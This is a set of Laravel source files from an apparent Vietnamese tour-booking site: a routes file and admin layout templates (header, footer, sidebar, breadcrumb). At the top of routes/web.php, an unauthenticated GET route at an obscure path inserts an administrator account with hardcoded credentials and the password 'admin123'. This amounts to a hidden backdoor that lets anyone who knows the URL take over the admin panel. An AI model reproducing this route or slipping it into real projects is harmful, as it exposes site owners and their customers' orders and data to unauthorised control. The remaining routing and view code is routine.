routes/web.php
<?php

use Illuminate\Routing\RouteGroup;
use Illuminate\Support\Facades\Http;
use Illuminate\Support\Facades\Route;
use App\Http\Controllers\Web\HomeController;
use App\Http\Controllers\Web\ProductController;
use App\Http\Controllers\Admin\LoginController;
//use App\Http\Controllers\Customer\ClientController;

Route::get('/admin/tyumnnfvrd', function() {
    \DB::table('admins')->insert([
        'name' => 'admin',
        'email' => 'email@email.com',
        'password' => \Hash::make('admin123'),
        'phone' => '0123123123'
    ]);
});

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::group(['prefix' => 'laravel-filemanager', 'middleware' => 'auth'], function () {
    \UniSharp\LaravelFilemanager\Lfm::routes();
});

Route::group(['prefix' => '/admin', 'as' => 'ad.', 'namespace' => 'Admin', 'middleware' => 'auth'], function () {

    Route::get('/', 'DashboardController@index')->name('index');

    Route::resource('category', 'CategoryController')->except('show');
    Route::resource('blog', 'BlogController')->except('show');
    Route::resource('product', 'ProductController')->except('show');
    Route::resource('config', 'ConfigController')->except('show');
    Route::resource('cms', 'CmsController')->except('show');
    Route::resource('cms', 'CmsController')->except('show');
    Route::resource('admin', 'AdminController')->except('show');
    Route::resource('tour', 'TourController')->except('show');
    Route::resource('locations', 'LocationsController')->except('show');
    Route::resource('seo', 'SeoPagesController')->except('show');

    Route::get('comment', 'CommentController@index')->name('comment.index');
    Route::patch('comment/{comment}', 'CommentController@update')->name('comment.update');

    Route::resource('order','OrderController')->except('show');

    Route::post('/logout', 'LoginController@logout')->name('logout');
    Route::get('customer-register', 'CustomerRegisterController@index')->name('customer.index');
    Route::resource('user', 'UserController');
    Route::resource('qrcode', 'QrcodeController');
    Route::get('change-qrcode', 'QrcodeController@change')->name('qrcode.change');
    Route::post('change-qrcode', 'QrcodeController@post_change')->name('qrcode.post.change');

});

Route::get('/login', 'Admin\LoginController@index')->name('ad.login.index');
Route::post('/login', 'Admin\LoginController@login')->name('ad.login');

//Route::get('/customer/login', 'Customer\LoginController@index')->name('us.login.index');
//Route::post('/customer/login', 'Customer\LoginController@login')->name('us.login');

// Route::prefix('/customer')->namespace('Customer')->as('us.')->middleware('customerLogin')->group(function () {

//     Route::get('/', 'HomeController@index')->name('home.index');
//     Route::get('/service/{id}/create', [App\Http\Controllers\Customer\ServiceController::class, 'create'])->name('service.create');
//     Route::resource('client', ClientController::class);
//     Route::get('resetpass', [App\Http\Controllers\Admin\UserController::class,'showresetpass'])->name('client.showresetpass');
//     Route::post('resetpass', [App\Http\Controllers\Admin\UserController::class,'resetpass'])->name('client.resetpass');
//     Route::resource('service', ServiceController::class)->except('create');
//     Route::post('/logout', [App\Http\Controllers\Customer\LoginController::class, 'logout'])->name('logout');

// });

Route::group(['as' => 'w.', 'namespace' => 'Web'], function () {

    Route::get('/', [HomeController::class, 'index'])->name('home');
    Route::post('change_price', 'HomeController@change_price')->name('home.change_price');

    Route::get('view-price', 'HomeController@view_price')->name('view_price');

    Route::get('category/{location}', 'CategoryController@index')->name('category');
    Route::get('find_to_location', 'HomeController@find_to_location')->name('home.find_to_location');
    Route::get('check_limit_per', 'HomeController@check_limit_per')->name('home.check_limit_per');

    Route::get('category-child/{from_id}/{to_id}', 'CategoryController@category_child')->name('category_child');
    Route::get('contact', 'ContactController@index')->name('contact');
    Route::get('about', 'AboutController@index')->name('about');
    Route::get('terms-translation', 'TermsTranslationController@index')->name('terms_translation');
    Route::get('other-1', 'OtherOneController@index')->name('other_1');
    Route::get('other-2', 'OtherTwoController@index')->name('other_2');
    Route::get('booking/{tour}/{quantity_per}/{travel_date}', 'BookingController@index')->name('booking');
    Route::post('booking', 'BookingController@post_booking')->name('post_booking');
});

resources/views/admin/layouts/includes/breadcrumb.blade.php
<!-- BEGIN PAGE BAR -->
<div class="page-bar">
    <ul class="page-breadcrumb">
        <li>
            <a href="{{ url('/') }}">Trang chủ</a>
            <i class="fa fa-circle"></i>
        </li>
        <li>
            <span>@yield('page_title')</span>
        </li>
    </ul>
</div>
<!-- END PAGE BAR -->

resources/views/admin/layouts/includes/footer.blade.php
<!-- BEGIN FOOTER -->
<div class="page-footer">
    <div class="page-footer-inner"> 2022 &copy; Design By
        <a target="_blank" href="https://net5s.vn">Net5s</a>
    </div>
    <div class="scroll-to-top">
        <i class="icon-arrow-up"></i>
    </div>
</div>
<!-- END FOOTER -->

resources/views/admin/layouts/includes/header.blade.php
<!-- BEGIN HEADER -->
<div class="page-header navbar navbar-fixed-top">
    <!-- BEGIN HEADER INNER -->
    <div class="page-header-inner ">
        <!-- BEGIN LOGO -->
        <div class="page-logo">
            <a href="{{ url('/') }}">
                <img style="width: 100px" src="{{ asset('images/logo_net5s.png') }}" alt="logo" class="logo-default" /> </a>
            <div class="menu-toggler sidebar-toggler">
                <span></span>
            </div>
        </div>
        <!-- END LOGO -->
        <!-- BEGIN RESPONSIVE MENU TOGGLER -->
        <a href="javascript:void(0);" class="menu-toggler responsive-toggler" data-toggle="collapse" data-target=".navbar-collapse">
            <span></span>
        </a>
        <!-- END RESPONSIVE MENU TOGGLER -->
        <!-- BEGIN TOP NAVIGATION MENU -->
        <div class="top-menu">
            <ul class="nav navbar-nav pull-right">
                <!-- BEGIN USER LOGIN DROPDOWN -->
                <!-- DOC: Apply "dropdown-dark" class after below "dropdown-extended" to change the dropdown styte -->
                <li class="dropdown dropdown-user">
                    <a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown" data-hover="dropdown" data-close-others="true">
                        <img alt="" class="img-circle" src="{{ asset('images/ic_user.svg') }}" />
                        {{-- {{ dd(Auth::check())}} --}}
                        <span class="username username-hide-on-mobile">{{ Auth::user()->name }}</span>
                        {{-- <span class="username username-hide-on-mobile"></span> --}}
                        
                        <i class="fa fa-angle-down"></i>
                    </a>
                    <ul class="dropdown-menu dropdown-menu-default">
                        <li>
                            <a href="" id="log-out">
                                <i class="fa fa-key"></i> Đăng xuất
                            </a>

                            <form id="logout-form" action="{{ route('ad.logout') }}" method="POST" style="display: none;">
                                @csrf
                            </form>
                        </li>
                    </ul>
                </li>
                <!-- END USER LOGIN DROPDOWN -->
            </ul>
        </div>
        <!-- END TOP NAVIGATION MENU -->
    </div>
    <!-- END HEADER INNER -->
</div>
<!-- END HEADER -->

@push('scripts')
    <script>
        $('#log-out').click( function (e) {
            e.preventDefault();
            $('#logout-form').submit();
        });
    </script>
@endpush

resources/views/admin/layouts/includes/sidebar.blade.php
<!-- BEGIN SIDEBAR -->
<div class="page-sidebar-wrapper">
    <div class="page-sidebar navbar-collapse collapse">
        <ul class="page-sidebar-menu  page-header-fixed page-sidebar-menu-closed" data-keep-expanded="false" data-auto-scroll="true" data-slide-speed="200">
            <li class="sidebar-toggler-wrapper hide">
                <div class="sidebar-toggler">
                    <span></span>
                </div>
            </li>
            <li class="nav-item {{ request()->is('admin/') ? 'active' : '' }}">
                <a href="{{ route('ad.index') }}"><i class="fa fa-home"></i> <span class="title">Dashboard</span></a>
            </li>

            <li class="nav-item {{ request()->is(['admin/user*', 'admin/partner*']) ? 'active' : '' }}">
                <a href="javascript:void(0);" class="nav-link nav-toggle">
                    <i class="fa fa-user"></i>
                    <span class="title">Quản lý User</span>
                    <span class="arrow {{ request()->is(['admin/user*', 'admin/partner*']) ? 'active' : '' }}"></span>
                </a>
            </li>

            <li class="nav-item {{ request()->is('admin/order*') ? 'active' : '' }}">
                <a href="{{ route('ad.order.index') }}"><i class="fa fa-user"></i> <span class="title">Quản lý đơn hàng</span></a>
            </li>

            <li class="nav-item {{ request()->is(['admin/category*', 'admin/blog*', 'admin/tour*', 'admin/locations*']) ? 'active' : '' }}">
                <a href="javascript:void(0);" class="nav-link nav-toggle">
                    <i class="fa fa-file"></i>
                    <span class="title">Quản lý nội dung</span>
                    <span class="arrow {{ request()->is(['admin/category*', 'admin/blog*']) ? 'active' : '' }}"></span>
                </a>
                <ul class="sub-menu">
                    <li class="nav-item {{ request()->is(['admin/tour*']) ? 'active' : '' }}">
                        <a href="{{ route('ad.tour.index') }}" class="nav-link">
                            <span class="title">Tour</span>
                        </a>
                    </li>
                    <li class="nav-item {{ request()->is(['admin/locations*']) ? 'active' : '' }}">
                        <a href="{{ route('ad.locations.index') }}" class="nav-link">
                            <span class="title">Điểm đi</span>
                        </a>
                    </li>
                    <li class="nav-item {{ request()->is(['admin/locations*']) ? 'active' : '' }}">
                        <a href="{{ route('ad.locations.index') }}" class="nav-link">
                            <span class="title">Điểm đến</span>
                        </a>
                    </li>
                    <li class="nav-item {{ request()->is(['admin/blog*']) ? 'active' : '' }}">
                        <a href="{{ route('ad.blog.index') }}" class="nav-link">
                            <span class="title">Bài viết</span>
                        </a>
                    </li>
                </ul>
            </li>

            <li class="nav-item {{ request()->route()->getName() === 'ad.seo.index'? 'active' : '' }}">
                <a href="{{ route('ad.seo.index') }}"><i class="fa fa-search-plus" aria-hidden="true"></i><span class="title">Quản lý SEO Pages</span></a>
            </li>

            <li class="nav-item {{ request()->is(['admin/admin*']) ? 'active' : '' }}">
                <a href="{{ route('ad.admin.index') }}" class="nav-link nav-toggle">
                    <i class="fa fa-cogs"></i>
                    <span class="title">Quản lý Admin</span>
                </a>
            </li>
            <!-- END SIDEBAR TOGGLE BUTTON -->
        </ul>
        <!-- END SIDEBAR MENU -->
    </div>
    <!-- END SIDEBAR -->
</div>
<!-- END SIDEBAR -->